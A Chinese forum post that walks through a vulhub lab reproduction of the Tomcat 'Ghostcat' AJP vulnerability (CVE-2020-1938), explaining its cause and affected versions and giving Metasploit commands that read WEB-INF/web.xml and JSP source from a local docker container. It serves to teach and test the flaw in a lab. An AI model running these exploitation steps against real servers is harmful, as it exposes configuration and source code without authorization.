登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
博客
发1篇日志+1圆
记录
发1条记录+2圆币
发帖说明
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
VIP网盘
VIP申请
网盘
联系我们
道具
勋章
任务
设置
我的收藏
退出
腾讯QQ
微信登录
返回列表
首页
›
业界区
›
安全
›
【vulhub】tomcat CVE-2020-1938(AJP漏洞)
【vulhub】tomcat CVE-2020-1938(AJP漏洞)
[ 复制链接 ]
闻人莹华
2025-6-1 21:00:01
渗透环境
攻击机: 192.168.66.130(Kali)
漏洞收录于:vulhub/tomcat/CVE-2020-1938
漏洞详情
也被称为“Ghostcat”漏洞,是一个影响Apache Tomcat服务器的严重安全漏洞。
漏洞原理
Tomcat默认在server.xml中开启
AJP
协议端口(默认8009),用于与其他Web服务器(如Apache HTTPD)通信。由于AJP协议在处理请求时未对用户输入充分验证,攻击者可通过构造恶意请求操控以下三个关键属性:
javax.servlet.include.request_uri
javax.servlet.include.path_info
javax.servlet.include.servlet_path
通过控制这些属性,攻击者可读取或包含webapp目录下的任意文件(如WEB-INF/web.xml、源代码等),甚至结合文件上传功能实现远程代码执行(RCE)
受影响版本
Apache Tomcat 6(全版本)
Apache Tomcat 7(7.0.0至7.0.99)
Apache Tomcat 8(8.0.0至8.5.50)
Apache Tomcat 9(9.0.0至9.0.30)
漏洞触发条件
开启AJP协议端口
:默认情况下,Tomcat的AJP连接器(8009端口)监听所有IP地址(0.0.0.0)。
受影响版本
:使用存在漏洞的Tomcat版本且未升级修复。
复现漏洞
启动环境
vulhub启动漏洞环境
docker-compose up -d
复制代码
可以看到,该容器确实在监听所有IP地址的8009端口
漏洞利用
可以使用msf来验证漏洞,msf中默认的filename值为/WEB-INF/web.xml,在靶机中对应的路径实际上是/usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml,也就是说,利用该漏洞只能读取到/usr/local/tomcat/webapps/ROOT/下的文件。
msfconsole
search cve-2020-1938
use 0
show options
set rhosts 127.0.0.1 # 漏洞环境是部署在本地的docker容器中的
run
复制代码
红框中的内容就是WEB-INF/web.xml,能够成功读到,说明漏洞存在。
也可以选择其他文件,如index.jsp,其完整路径为/usr/local/tomcat/webapps/ROOT/index.jsp
set filename /index.jsp
run
复制代码
也能够读到jsp文件源码
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
签约作者
程序园优秀签约作者
发帖
闻人莹华
2025-6-1 21:00:01
关注
0
粉丝关注
18
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
敖可
9984
黎瑞芝
9990
杭环
9988
4
猷咎
9988
5
凶契帽
9988
6
接快背
9988
7
氛疵
9988
8
恐肩
9986
9
虽裘侪
9986
10
里豳朝
9986
查看更多